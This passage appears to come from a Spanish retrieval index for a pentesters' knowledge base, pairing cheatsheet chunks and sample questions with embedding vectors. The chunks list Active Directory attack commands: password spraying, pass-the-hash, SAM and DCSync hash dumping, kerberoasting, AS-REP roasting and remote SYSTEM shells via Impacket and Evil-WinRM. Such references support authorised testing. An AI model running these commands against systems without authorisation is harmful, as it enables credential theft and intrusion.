-0.0224, 0.09486, -0.15584, 0.08565, -0.07152, -0.22964, -0.077, 0.00044, 0.14498, 0.01026, 0.09093, -0.05686, 0.06414, -0.0237, -0.00019, 0.09518, -0.12685, 0.04005, 0.08913, 0.11191, -0.10257, 0.0196, 0.04402, 0.02732, -0.00844, 0.10942, 0.05966, 0.01072, 0.03582, -0.02108, 0.20909, -0.08683, 0.18964, -0.02154, -0.02698, 0.04072, -0.14226, 0.07206, 0.0751, -0.00269, -0.07647, -0.05944, -0.02383, 0.0266, -0.05056, -0.04055, -0.26338, 0.04302, 0.00535, 0.00265, -0.00827, -0.01327, 0.03791, -0.10116, -0.02292, 0.01752, 0.00866, -0.0222, -0.06587, 0.03664, 0.10643, -0.00215, -0.07814, 0.10543, 0.00569, 0.02646, 0.05231, -0.0017, -0.08161, -0.1114, 0.0434, -0.0939, -0.05329, 0.16341, 0.07381, -0.00813, -0.02388, 0.00598, -0.12807, 0.00025, 0.02734, -0.09181, -0.00156, 0.00679, 0.00963, -0.04222, -0.03913, 0.11211, 0.04288, -0.10521, 0.06071, 0.05644, 0.00917, -0.00632, 0.00823, 0.0198, -0.07738, 0.04991, 0.03725, 0.04647, 0.0282, 0.05916, -0.09776, 0.11997, 0.05842, 0.0941, -0.09326, -0.04026, 0.06511, -0.08193, -0.03239, 0.04515, -0.01521, 0.03601, -0.0555, -0.02649, -0.00429, -0.02415, -0.03775, 0.03432, -0.03551, 0.07244, 0.06728, -0.00047, 0.05095, -0.04174, -0.00264, -0.10596, -0.0625, -0.03475, -0.00964, 0.01847, 0.02163, -0.00331, -0.08465, 0.01022, 0.00276, 0.05152, -0.01741, 0.0142, -0.01859, 0.05501, -0.01616, -0.00229, -0.03842, 0.02087, -0.03767, 0.09764, 0.00272, 0.04557, 0.01869, 0.027, -0.01499, 0.02707, 0.05117, -0.05071, -0.01591, 0.03846, -0.07205, 0.04076, 0.0045, -0.02958, -0.00145, 0.06583, -0.07001, 0.12377, 0.0576, -0.11741, -0.01337, -0.06771, 0.03784, -0.10373, 0.09974, -0.05269, 0.026, -0.0014, 0.01393, 0.01797, -0.00994, 0.01933, 0.03897, -0.00716, -0.00798, -0.03086, 0.00441, 0.019, 0.00326, -0.06837, -0.00189, -0.02713, 0.06104, -0.07283, -0.02007, -0.02059, -0.03859, -0.02461, 0.03562, -0.07648, 0.03121, 0.03659, 0.06237, 0.0398, 0.05775, 0.05702, 0.00291, 0.00077, 0.03532, -0.0177, -0.03328, 0.03789, 0.05418, 0.00424, -0.06709, 0.01068, -0.07856, -0.01351, 0.00137, 0.01401, 0.05278, 0.06743, 0.01267, -0.03092, -0.01358, 0.01611, 0.02301, -0.0449, 0.021, 0.00922, 0.00216, -0.02482, -0.01048, -0.00177, 0.05012, -0.01486, 0.02944, 0.01798, -0.04313, 0.04206, -0.05419, -0.04034, 0.04104, -0.04632, -0.04809, -0.03077, 0.00595, -0.02893, 0.0101, 0.01856, -0.02601, 0.03247]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# CrackMapExec / NetExec β€” el navaja suiza de AD\ncrackmapexec smb IP -u USER -p PASS --shares\ncrackmapexec smb 10.0.0.0/24 -u USER -p PASS # barrido/spray\ncrackmapexec smb IP -u USER -H HASH --sam # pass-the-hash + dump SAM\ncrackmapexec winrm IP -u USER -p PASS -x \"whoami\"\nnetexec smb IP -u USER -p PASS --users --groups", "indexar": "con que puedo hacer un barrido masivo de puertos SMB para encontrar cuentas vΓ‘lidas?", "v": [0.21684, -0.00208, -0.1865, 0.03745, -0.0656, -0.01645, 0.14514, -0.21837, -0.16613, -0.15764, -0.06154, 0.0324, 0.16938, -0.01345, -0.05266, 0.08144, -0.00443, -0.01964, 0.00126, 0.00725, 0.15705, -0.16466, -0.00767, 0.04965, 0.01192, -0.02598, 0.00695, -0.02543, -0.17429, 0.13152, -0.00375, 0.04652, 0.02275, -0.02189, 0.03871, -0.11424, -0.02051, 0.0796, -0.02104, -0.04582, 0.09705, 0.00723, -0.02449, -0.11072, 0.03112, -0.08726, -0.03726, 0.00577, 0.03256, 0.02112, -0.00807, -0.05095, -0.16772, 0.10123, -0.12169, -0.10516, 0.06995, 0.02484, -0.05163, -0.07518, -0.03518, 0.0056, 0.10338, 0.038, 0.0066, -0.05173, 0.02486, 0.11895, 0.01364, 0.03767, -0.13589, 0.0089, -0.0361, 0.05914, -0.00207, -0.02409, 0.05876, -0.0691, -0.05081, 0.04826, 0.01493, -0.13701, 0.0479, -0.01159, -0.04123, -0.06114, -0.13548, -0.05283, 0.06417, -0.07865, 0.02199, -0.04088, -0.00199, 0.09479, -0.05844, 0.02042, -0.03853, 0.06373, -0.01476, -0.0151, 0.02105, 0.04405, -0.13845, -0.00641, 0.04362, 0.09552, -0.02405, -0.05251, 0.10875, -0.03087, 0.08457, -0.0478, -0.03614, -0.01355, -0.09876, 0.06165, -0.05805, -0.04584, -0.00057, 0.02142, -0.02195, -0.10171, -0.03629, 0.00038, -0.05117, -0.03127, 0.03318, 0.06409, -0.00043, 0.03, 0.00761, -0.03299, -0.0269, -0.04162, -0.06833, -0.05124, -0.02935, -0.0733, -0.03846, -0.00483, -0.0688, 0.036, -0.0029, -0.04441, -0.03211, -0.0114, -0.04662, -0.03772, -0.09582, 0.00247, 0.04767, 0.02247, -0.08234, 0.04837, -0.03805, 0.03568, 0.12382, -0.08132, -0.04045, 0.06649, -0.03184, 0.00372, -0.0328, 0.03213, 0.01555, -0.04342, -0.02929, -0.00442, -0.00832, -0.01547, -0.07325, 0.10567, -0.02294, -0.04214, 0.03874, -0.07075, 0.0112, -0.08522, -0.05948, 0.00188, -0.08923, 0.0218, -0.01946, -0.01876, -0.0517, -0.06471, -0.00238, -0.05973, 0.04797, 0.0462, -0.00779, 0.0314, -0.01569, 0.01009, -0.06746, -0.02384, -0.00565, 0.01353, -0.03656, -0.00998, -0.01912, 0.07281, -0.05075, -0.00987, 0.06287, 0.03653, -0.07387, 0.08583, -0.01523, 0.0029, 0.03771, -0.01183, 0.02258, -0.07972, -0.04406, 0.01643, -0.00803, 0.00359, 0.09129, 0.05487, -0.04195, 0.04129, 0.01324, 0.0898, 0.03381, -0.02122, 0.03588, 0.00177, 0.03256, 0.06531, -0.01679, 0.05305, 0.00619, -0.03399, 0.04967, 0.04839, -0.00843, -0.00146, 0.00578, -0.0243, 0.01875, -0.04202, 0.00249, 0.00181, 0.00296, -0.03699, -0.0414, 0.02255, -0.00922, -0.06354, 0.03249, 0.05228, 0.02775, -0.00012, 0.0377, -0.01068]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Impacket\nimpacket-secretsdump DOM/USER:PASS@IP # dump de hashes\nimpacket-secretsdump -just-dc DOM/USER@IP -hashes :HASH # DCSync (con priv)\nimpacket-GetUserSPNs DOM/USER:PASS -dc-ip IP -request # kerberoasting\nimpacket-GetNPUsers DOM/ -usersfile users.txt -no-pass # AS-REP roasting\nimpacket-getTGT DOM/USER:PASS # pedir TGT (Pass-the-Ticket)\nimpacket-psexec DOM/USER:PASS@IP # shell SYSTEM\nimpacket-wmiexec DOM/USER:PASS@IP # shell sin tocar disco\nimpacket-smbexec DOM/USER@IP -hashes :HASH\nimpacket-mssqlclient DOM/USER:PASS@IP -windows-auth", "indexar": "que herramienta me sirve para sacar hashes de un dominio", "v": [0.03871, -0.01037, -0.24484, -0.11463, -0.03291, -0.18418, -0.04158, -0.08898, -0.06472, 0.12602, -0.07141, -0.05304, 0.00499, -0.21319, 0.04137, 0.11689, 0.15811, -0.06315, -0.07922, 0.04835, 0.03899, 0.04249, -0.09943, -0.03897, -0.04958, -0.10914, 0.0065, -0.05567, -0.27379, 0.14327, 0.02507, 0.02024, -0.0284, -0.0588, -0.09108, -0.05703, -0.02246, 0.05003, 0.07014, 0.07658, 0.00527, 0.05963, -0.14641, 0.02876, -0.07968, 0.01338, -0.05569, -0.00669, 0.03875, 0.00962, 0.04674, -0.16255, -0.15365, 0.04186, -0.00782, -0.13418, 0.11259, -0.08611, -0.05611, -0.11862, -0.13824, -0.02966, -0.02352, -0.00284, -0.03327, -0.12273, -0.00062, -0.05152, -0.03031, 0.03148, -0.02431, 0.09186, 0.10147, -0.01906, -0.00948, -0.04519, 0.05538, 0.01562, 0.07241, -0.03159, 0.07776, -0.04537, -0.04442, -0.00479, -0.09342, -0.08549, 0.02704, -0.10122, 0.07561, -0.01029, -0.00052, 0.1012, -0.0971, -0.04555, -0.03534, -0.00488, 0.08423, -0.03446, -0.01397, -0.06446, 0.146, -0.00121, -0.10681, 0.04313, 0.03672, 0.05071, 0.01582, -0.07868, -0.06214, 0.01564, 0.06372, -0.05376, -0.01944, 0.0159, -0.05609, 0.10403, -0.04244, 0.0071, -0.03937, -0.02001, -0.00452, -0.04432, 0.04549, -0.0225, 0.02386, -0.03695, -0.07459, 0.01282, -0.01789, -0.1458, 0.00523, -0.00919, -0.04632, 0.02086, 0.01702, 0.02945, 0.06857, -0.06239, -0.03131, -0.07032, 0.02915, 0.06758, -0.10741, -0.0987, 0.01516, -0.02646, 0.04365, -0.05567, -0.00972, -0.05175, -0.03006, -0.08105, 0.02004, 0.05308, -0.05346, 0.02485, -0.05911, -0.00585, -0.07079, 0.03786, -0.07151, -0.04392, 0.03447, 0.02612, 0.01832, -0.01571, 0.03563, -0.03095, 0.07441, 0.05725, 0.02687, -0.01972, 0.04056, 0.00235, 0.00899, -0.05389, -0.03841, 0.01513, -0.02672, -0.05768, -0.03666, -0.06391, -0.02067, 0.03722, -0.02764, 0.0361, 0.04088, -0.04061, -0.01262, 0.03918, 0.03417, 0.04606, -0.05571, -0.02862, 0.02862, 0.00105, 0.02329, -0.03244, 0.04828, -0.02723, -0.0407, -0.00406, 0.00487, -0.03268, 0.02968, 0.06056, -0.03177, -0.04544, 0.00327, 0.01492, -0.01035, -0.00581, 0.01622, -0.0277, -0.01682, 0.01965, 0.00226, 0.01985, -0.05676, -0.03987, -0.0149, 0.04624, 0.01892, -0.02051, -0.01413, 0.06421, 0.0183, 0.00092, 0.01841, 0.00809, 0.00694, -0.00595, -0.0405, -0.00658, 0.01579, -0.05778, 0.04085, -0.00911, -0.04755, -0.019, -0.02867, 0.02463, 0.01701, -0.03179, -0.05676, -0.06197, -0.01619, 0.01139, -0.0416, -0.04182, -0.00772, 0.00275, 0.05828, -0.01265, -0.00956, -0.00181]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Impacket\nimpacket-secretsdump DOM/USER:PASS@IP # dump de hashes\nimpacket-secretsdump -just-dc DOM/USER@IP -hashes :HASH # DCSync (con priv)\nimpacket-GetUserSPNs DOM/USER:PASS -dc-ip IP -request # kerberoasting\nimpacket-GetNPUsers DOM/ -usersfile users.txt -no-pass # AS-REP roasting\nimpacket-getTGT DOM/USER:PASS # pedir TGT (Pass-the-Ticket)\nimpacket-psexec DOM/USER:PASS@IP # shell SYSTEM\nimpacket-wmiexec DOM/USER:PASS@IP # shell sin tocar disco\nimpacket-smbexec DOM/USER@IP -hashes :HASH\nimpacket-mssqlclient DOM/USER:PASS@IP -windows-auth", "indexar": "cual programa puedo usar para rogar credenciales con Kerberos o AS-REP", "v": [-0.26292, -0.15361, 0.01139, -0.07202, 0.14668, -0.11811, 0.07257, 0.06278, -0.13912, -0.11349, -0.22293, -0.05822, -0.06538, -0.12749, 0.21027, 0.04496, -0.14448, 0.06271, 0.08416, 0.13361, 0.06644, -0.02858, -0.1399, -0.02212, 0.05041, 0.12818, 0.02554, -0.08022, 0.08322, -0.01868, -0.05353, 0.03942, -0.03936, -0.05749, -0.11307, 0.00984, -0.04307, 0.08525, 0.09022, 0.18377, 0.01631, 0.05925, -0.01407, 0.09714, 0.08553, 0.02163, 0.03721, -0.00891, -0.14035, -0.01128, 0.00767, -0.01897, -0.05162, -0.02904, 0.02106, -0.03946, 0.02687, -0.11289, -0.12468, 0.01484, -0.00813, -0.02396, 0.02891, 0.01397, 0.01188, -0.13307, -0.02012, -0.06094, -0.08606, -0.02324, -0.08492, 0.067, 0.09657, 0.00024, -0.03803, 0.01322, -0.00243, -0.09103, 0.06199, -0.02897, -0.02009, -0.052, 0.05788, 0.12865, 0.04474, -0.07479, 0.04895, -0.0324, -0.00435, -0.06773, -0.03445, 0.05905, 0.03017, 0.04562, 0.04354, -0.07228, -0.03872, 0.0749, -0.03708, -0.01072, 0.00725, -0.03308, 0.0026, 0.06661, -0.09171, 0.00819, 0.00864, 0.05399, -0.01509, -0.0276, 0.03749, 0.03025, -0.08996, -0.0137, -0.04294, 0.08672, -0.01193, -0.04448, 0.11899, -0.02457, -0.01951, 0.02968, -0.00703, -0.0171, 0.12468, 0.06572, 0.07189, 0.08551, -0.10774, 0.00406, -0.0177, 0.03808, -0.01042, -0.02947, 0.01697, -0.10016, -0.08689, -0.02015, -0.02724, 0.03651, 0.00243, 0.04693, -0.02323, 0.03824, -0.04051, -0.00553, -0.01717, -0.02352, 0.06192, -0.01604, 0.05055, 0.07446, -0.03054, 0.02984, -0.03672, -0.06307, 0.06618, 0.02235, -0.03252, 0.03968, -0.06416, -0.03592, 0.01042, 0.01966, 0.07871, -0.02793, 0.03767, 0.00248, 0.05145, 0.11269, 0.01129, 0.0509, 0.03114, -0.03905, 0.01668, -0.00723, 0.01653, -0.03315, -0.04588, -0.04066, -0.00148, -0.01026, 0.10116, 0.06418, -0.00364, 0.01601, -0.02774, 0.08276, -0.03336, -0.02614, -0.00395, -0.00516, 0.03885, -0.02379, 0.01249, -0.00495, 0.07486, -0.02057, -0.03592, 0.00709, -0.09472, 0.03539, -0.00917, -0.05188, 0.05228, 0.04647, 0.03161, -0.01432, 0.04946, 0.08724, -0.00222, -0.06234, 0.06524, 0.0011, -0.06631, -0.00911, -0.01311, 0.02759, -0.00306, 0.03933, 0.02593, -0.03917, 0.00737, 0.07185, 0.0123, -0.00807, 0.00813, -0.01965, -0.05384, 0.0163, -0.01482, -0.01824, -0.01965, -0.0415, -0.03206, -0.02719, -0.05127, 0.02513, -0.00073, -0.03363, -0.05422, 0.02253, 0.00189, -0.00425, -0.01691, 0.05298, -0.05323, -0.05889, 0.00268, 0.02347, -0.00655, 0.02545, -0.02832, -0.06091, 0.03037, 0.03991]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Impacket\nimpacket-secretsdump DOM/USER:PASS@IP # dump de hashes\nimpacket-secretsdump -just-dc DOM/USER@IP -hashes :HASH # DCSync (con priv)\nimpacket-GetUserSPNs DOM/USER:PASS -dc-ip IP -request # kerberoasting\nimpacket-GetNPUsers DOM/ -usersfile users.txt -no-pass # AS-REP roasting\nimpacket-getTGT DOM/USER:PASS # pedir TGT (Pass-the-Ticket)\nimpacket-psexec DOM/USER:PASS@IP # shell SYSTEM\nimpacket-wmiexec DOM/USER:PASS@IP # shell sin tocar disco\nimpacket-smbexec DOM/USER@IP -hashes :HASH\nimpacket-mssqlclient DOM/USER:PASS@IP -windows-auth", "indexar": "con que herramienta puedo ejecutar comandos sin tocar el disco local", "v": [0.08141, 0.03641, -0.26717, -0.07114, 0.0097, -0.10145, 0.02126, 0.09503, -0.02427, -0.04835, -0.04578, -0.00656, 0.0356, -0.10473, 0.07346, 0.02468, 0.17624, -0.03931, -0.04601, -0.01581, 0.01898, -0.0991, -0.01998, 0.02975, 0.11003, -0.07308, 0.0216, 0.01617, -0.19201, -0.004, -0.00848, 0.00585, 0.04379, -0.14272, 0.01999, -0.11954, -0.00595, -0.04375, 0.06081, 0.10727, -0.08861, 0.07846, -0.1672, 0.04832, -0.00648, -0.03467, 0.06517, 0.00478, 0.04659, -0.00563, 0.04428, -0.08267, -0.12595, -0.08177, -0.0531, -0.14477, 0.19221, -0.08503, 0.06605, 0.03748, -0.08553, -0.07013, -0.01052, 0.08455, 0.10455, 0.03313, 0.06223, -0.16354, 0.02359, 0.14312, -0.14249, 0.09089, 0.04691, 0.05003, 0.05172, -0.05729, 0.03015, -0.0148, 0.09384, -0.07718, 0.02105, -0.01261, -0.05626, 0.03957, -0.14392, -0.0676, 0.01971, -0.06234, 0.01147, -0.05342, 0.0243, -0.03245, -0.03474, 0.03783, 0.08417, 0.04785, 0.07262, 0.06088, -0.00529, -0.01696, 0.14148, -0.03428, -0.10644, 0.02709, 0.11737, 0.01031, 0.02768, -0.02212, 0.05145, 0.10466, 0.04416, 0.01577, 0.02844, -0.04445, -0.0254, -0.00999, -0.02229, -0.03955, -0.02418, 0.02488, -0.01536, 0.05064, -0.033, -0.02245, -0.01841, 0.01076, -0.03602, 0.03796, -0.00882, -0.00728, 0.04046, -0.03402, 0.10465, -0.03861, 0.02073, 0.08836, -0.0047, -0.07385, -0.03601, -0.10716, 0.07534, 0.07488, -0.02636, -0.01389, 0.06739, 0.02665, -0.00015, 0.01386, -0.04318, 0.01078, 0.05944, 0.01453, -0.06853, 0.05012, -0.07192, -0.00268, 0.01783, 0.04718, -0.04288, -0.00267, 0.00935, -0.01521, -0.03217, -0.00033, -0.04219, -0.02644, 0.0183, 0.00145, 0.0487, 0.04923, -0.05768, 0.03544, 0.06232, 0.01498, 0.00123, -0.12314, -0.0364, -0.01009, 0.07973, -0.00417, 0.00904, 0.04374, -0.08744, -0.06882, 0.0093, -0.03679, -0.00852, -0.01457, -0.02752, 0.01764, 0.02256, 0.03229, 0.00587, -0.04961, 0.03046, -0.01582, 0.03292, 0.00603, -0.09853, 0.01317, -0.08362, -0.03273, -0.01158, -0.05562, 0.0696, 0.08071, -0.04247, 0.05308, -0.03073, 0.00062, 0.01121, -0.02443, 0.02888, 0.03574, 0.00227, -0.05417, -0.0013, 0.03417, -0.0458, 0.0505, 0.00015, 0.04744, 0.14667, -0.06556, -0.0187, 0.01154, 0.00833, -0.01346, 0.09237, 0.03826, 0.02978, 0.00203, -0.02503, 0.00103, 0.02403, -0.01278, 0.0158, -0.01808, -0.06278, -0.03126, -0.00739, 0.04774, 0.00685, -0.09801, -0.04142, -0.06935, -0.07802, -0.03467, -0.0465, -0.04481, 0.00936, 0.02775, 0.07397, -0.05096, -0.00099, 0.02596]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# BloodHound (recoleccion)\nbloodhound-python -d DOM -u USER -p PASS -ns IP -c all", "indexar": "ΒΏQuΓ© programa puedo usar para recolectar credenciales de dominios?", "v": [-0.11853, -0.05483, -0.10104, -0.01596, 0.18662, -0.01125, 0.18604, -0.02899, -0.14283, -0.14506, -0.20097, -0.04416, -0.03838, -0.2402, 0.0527, -0.03557, 0.12127, -4e-05, -0.04235, -0.08518, -0.09601, -0.17879, -0.05714, -0.00555, 0.04816, -0.00766, 0.04778, -0.08478, 0.06741, 0.08344, 0.04089, -0.0327, 0.05831, -0.05396, -0.00719, -0.01699, -0.03224, 0.0889, 0.05854, 0.0527, 0.01429, -0.01386, -0.15307, -0.00246, 0.02036, -0.02014, -0.09938, -0.09644, -0.12101, -0.13696, -0.06313, -0.03051, -0.10875, -0.01905, 0.08112, -0.03023, 0.04925, -0.09553, -0.00561, 0.03275, -0.03619, 0.00632, 0.02145, 0.02146, -0.022, -0.17589, -0.00696, -0.02581, -0.05676, 0.0593, 0.00979, 0.04446, 0.10945, 0.01102, 0.0397, 0.02375, -0.00845, -0.15524, 0.12989, -0.04914, 0.05934, -0.02414, 0.05501, 0.0265, -0.03774, -0.10817, -0.01935, -0.10108, 0.04165, -0.0394, 0.02114, 0.06097, -0.01233, 0.02069, 0.05647, -0.06438, 0.04287, 0.02872, -0.01564, 0.05815, 0.04733, 0.00617, -0.04238, 0.16445, -0.00114, 0.08575, 0.06024, -0.07818, -0.04445, -0.02317, -0.00458, -0.06604, -0.12337, -0.02822, -0.09453, 0.12334, -0.09599, 0.00153, 0.04282, -0.10327, -0.01951, -0.03239, 0.0466, 0.01245, 0.1259, -0.01075, -0.04584, 0.03489, -0.05604, -0.03816, -0.00668, 0.02894, -0.03461, -0.03728, -0.03534, -0.02923, 0.05502, -0.06256, -0.08151, 0.02954, -0.0063, 0.0245, -0.03881, -0.0013, 0.05099, -0.04822, -0.00583, -0.11072, 0.0219, -0.07473, 0.06052, 0.04155, -0.00883, 0.05136, 0.01995, 0.03859, 0.04072, -0.03955, -0.06472, -0.01266, -0.06588, -0.04111, -0.00698, -0.01521, 0.0316, -0.02631, 0.06866, -0.02195, 0.05876, 0.10578, -0.0211, 0.06104, -0.07829, -0.04931, 0.01021, 0.01006, -0.04429, -0.02678, 0.01457, -0.05526, -0.05422, -0.01447, 0.0116, 0.03757, 0.00466, 0.0502, -0.00216, 0.02961, -0.0183, 0.03145, 0.02384, 0.03955, -0.00452, 0.00445, 0.00051, -0.02364, 0.03366, 0.01114, 0.00207, 0.01402, -0.0699, -0.02322, -0.04207, -0.01132, 0.0668, 0.07911, -0.02301, 0.04087, 0.05379, 0.05933, -0.03979, -0.04338, 0.08979, -0.02156, -0.05574, -0.03037, -0.02375, 0.05691, -0.03083, -0.05134, -0.01522, 0.02053, 0.01805, 0.02754, 0.05092, -0.01777, 0.06788, 0.01146, 0.04691, 0.05635, -0.03189, 0.01492, -0.00781, -0.04926, 0.01278, 0.01299, 0.01063, 0.00263, 0.00264, -0.04603, -0.03581, 0.05542, 0.01375, -0.00552, -0.06202, -0.00833, -0.09651, 0.0386, -0.0114, 0.00549, -0.00204, 0.02427, 0.05514, -0.06743, 0.04577, 0.03863]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# BloodHound (recoleccion)\nbloodhound-python -d DOM -u USER -p PASS -ns IP -c all", "indexar": "ΒΏExiste una herramienta en Python para realizar el anΓ‘lisis BloodHound?", "v": [-0.25138, -0.04323, 0.005, -0.16472, -0.01617, -0.09945, -0.10231, -0.04818, -0.04353, 0.03248, 0.07773, 0.01574, 0.01601, 0.05068, -0.03967, -0.01926, -0.09417, -0.10009, 0.01339, -0.02113, -0.14174, 0.02788, -0.212, 0.00965, 0.0486, 0.111, 0.01431, 0.11406, -0.09557, 0.07216, -0.02382, -0.01277, 0.02762, 0.01317, -0.10588, -0.06152, 0.03075, 0.11053, 0.05195, 0.10184, -0.05911, -0.06339, 0.02001, -0.00278, -0.06358, 0.00545, -0.00044, 0.04627, 0.05441, 0.11074, 0.03948, -0.11566, -0.18893, -0.04916, 0.05479, -0.15232, 0.09354, -0.1638, 0.06852, -0.0869, -0.03212, -0.04074, 0.03124, -0.02415, -0.06057, -0.01779, 0.01557, -0.04535, -0.0639, 0.18114, -0.07942, 0.06131, -0.0598, 0.04369, 0.00175, -0.09047, -0.03898, 0.03259, 0.03121, 0.03845, -0.05758, -0.01423, -0.04348, 0.02512, -0.0333, -0.10035, 0.0506, -0.07541, 0.10461, 0.01635, 0.00067, 0.02501, -0.01009, 0.06234, -0.01591, -0.02061, 0.05949, -0.08862, 0.01929, -0.03674, 0.09363, -0.05392, -0.05361, 0.1, -0.04429, 0.00419, -0.08117, 0.03383, -0.12814, -0.02849, 0.1091, -0.0117, -0.0362, 0.00475, -0.08356, -0.10349, 0.05132, 0.04445, 0.00591, -0.02688, 0.01248, 0.10942, -0.08427, 0.04147, -0.10018, -0.05511, -0.01038, 0.09122, 0.03508, -0.09199, -0.04818, 0.04193, -0.09479, -0.00765, -0.09732, 0.0972, 0.0716, -0.06398, 0.01935, -0.0714, -0.08033, -0.00141, 0.00531, 0.05402, -0.00217, -0.00565, -0.00202, -0.04074, -0.03036, 0.01117, 0.09572, -0.05422, -0.00561, 0.04439, -0.05923, -0.05595, -0.06117, 0.03299, -0.09353, -0.04385, -0.02715, -0.11749, 0.01686, -0.10006, 0.03317, 0.03906, 0.01977, 0.04674, 0.00412, -0.00257, 0.05825, -0.02562, 0.06515, 0.0029, 0.00314, -0.07973, 0.02407, -0.09076, -0.0251, -0.0125, -0.01085, -0.05522, -0.03435, -0.04576, 0.09075, -0.01025, 0.07867, -0.02239, 0.0117, 0.00125, 0.03615, 0.06185, 0.06378, -0.05562, 0.02929, 0.0348, 0.07644, -0.07073, 0.03832, -0.033, 0.00457, -0.02173, -0.05529, -0.02075, 0.00528, 0.06938, -0.08846, -0.02757, -0.05369, -0.03556, -0.02364, 0.01781, 0.01848, -0.02496, 0.0886, -0.01468, -0.00849, 0.02838, -0.04855, 0.00218, -0.05138, 0.02739, 0.0592, 0.0236, -0.06517, 0.03553, 0.04104, -0.03424, 0.04021, -0.0335, -0.02193, -0.01, -0.02852, 0.02441, -0.02349, 0.01717, 0.02977, -0.01937, -0.01586, 0.01203, 0.02039, 0.03898, -0.01495, -0.0431, -0.01732, -0.04412, -0.01042, 0.00445, -0.03681, -0.04451, -0.01756, -0.01755, 0.04356, -0.03148, 0.02268, 0.04638]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# BloodHound (recoleccion)\nbloodhound-python -d DOM -u USER -p PASS -ns IP -c all", "indexar": "ΒΏCΓ³mo puedo automatizar la recopilaciΓ³n de informaciΓ³n de usuarios y mΓ‘quinas?", "v": [-0.07068, 0.11986, 0.03619, -0.19899, -0.05701, -0.08884, -0.07468, -0.04083, -0.18457, -0.03599, -0.09399, -0.13774, 0.14365, 0.07742, 0.07916, -0.02453, 0.06973, -0.03875, -0.03227, 0.03814, 0.05526, -0.0663, -0.04297, -0.01358, -0.09561, 0.11087, 0.02694, -0.06001, -0.24427, 0.01184, -0.04574, -0.01729, 0.00549, 0.04756, -0.01392, -0.05675, 0.13409, 0.11704, 0.0481, 0.0301, -0.02704, -0.01105, -0.11386, -0.01657, 0.20356, 0.03344, -0.0089, -0.04787, -0.01514, -0.01361, -0.02256, -0.08839, -0.0136, -0.03785, -0.06539, -0.16608, 0.16156, -0.02482, 0.10404, -0.00695, 0.03673, 0.02627, -0.08579, 0.16955, -0.10694, 0.01452, 0.06526, -0.05944, -0.00246, 0.1012, 0.05347, -0.00807, 0.05104, -0.02475, 0.06774, 0.06841, 0.04894, 0.022, -0.03692, 0.01732, -0.02334, -0.03473, -0.05031, -0.11839, 0.04647, 0.03276, 0.03351, -0.01429, 0.03811, -0.10008, 0.03758, 0.03279, 0.07462, -0.01028, 0.1272, -0.00255, 0.07071, -0.05724, -0.031, 0.04338, 0.01311, 0.03855, 0.00594, 0.08209, -0.03688, 0.0237, 0.03094, -0.03503, 0.01185, -0.12728, 0.01355, 0.00565, -0.02999, -0.01323, -0.04199, 0.0405, 0.01182, 0.05067, 0.00221, -0.03528, -0.01215, 0.0578, 0.07881, -0.14779, 0.07551, 0.01712, 0.08552, 0.11985, -0.06559, -0.11341, 0.04644, 0.01279, -0.08169, -0.04657, 0.06886, 0.02124, -0.001, -0.04089, -0.07868, -0.05529, -0.04396, 0.05938, -0.09555, -0.0646, 0.02997, -0.08697, 0.03764, -0.07421, 0.00624, -0.07519, 0.0601, -0.0568, 0.0197, -0.02239, 0.04135, 0.03475, 0.04863, -0.02371, -0.05103, -0.02539, -0.01766, -0.04603, -0.03739, -0.01118, -0.05184, 0.06741, 0.0421, 0.02668, -0.0468, -0.05483, 0.07519, 0.02169, 0.02128, -0.00278, -0.01726, 0.04288, 0.004, 0.04345, 0.00195, 0.04794, 0.00508, -0.04147, -0.00253, -0.07383, 0.02753, 0.04431, 0.04691, -0.04661, 0.02309, 0.02869, -0.02263, -0.03513, -0.03009, -0.04599, 0.08845, 0.00142, 0.01859, 0.09616, 0.02296, -0.02296, -0.03859, 0.00655, -0.00499, 0.07261, -0.03528, 0.05135, 0.00773, -0.08745, 0.04383, -0.06412, 0.05629, 0.05481, -0.00559, -0.06695, -0.05614, -0.05718, -0.06955, -0.01811, -0.05059, -0.08357, 0.00282, -0.04781, -0.02942, 0.06673, -0.01179, 0.00386, 0.05942, 0.03943, 0.03577, -0.01168, -0.03513, 0.05915, 0.03417, 0.02376, -0.02196, -0.00866, -0.00198, 0.02831, -0.02151, -0.04046, 0.00798, 0.05788, 0.04837, -0.04944, -0.06392, -0.00387, 0.00609, -0.06181, -0.0941, -0.01588, -0.01377, -0.03728, -0.01334, 0.03441, -0.04037, 0.05059]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Evil-WinRM (shell interactiva Windows)\nevil-winrm -i IP -u USER -p PASS\nevil-winrm -i IP -u USER -H HASH # pass-the-hash\n```", "indexar": "que herramienta sirve para acceder a un servidor remoto de forma interactiva en Windows?", "v": [0.09046, 0.05692, -0.19988, -0.2272, 0.05835, -0.11747, -0.08392, -0.07989, 0.06858, -0.06175, -0.07414, -0.15775, 0.04406, -0.09458, 0.07195, 0.08338, 0.14554, -0.10086, -0.0287, 0.0737, 0.05685, 0.07073, 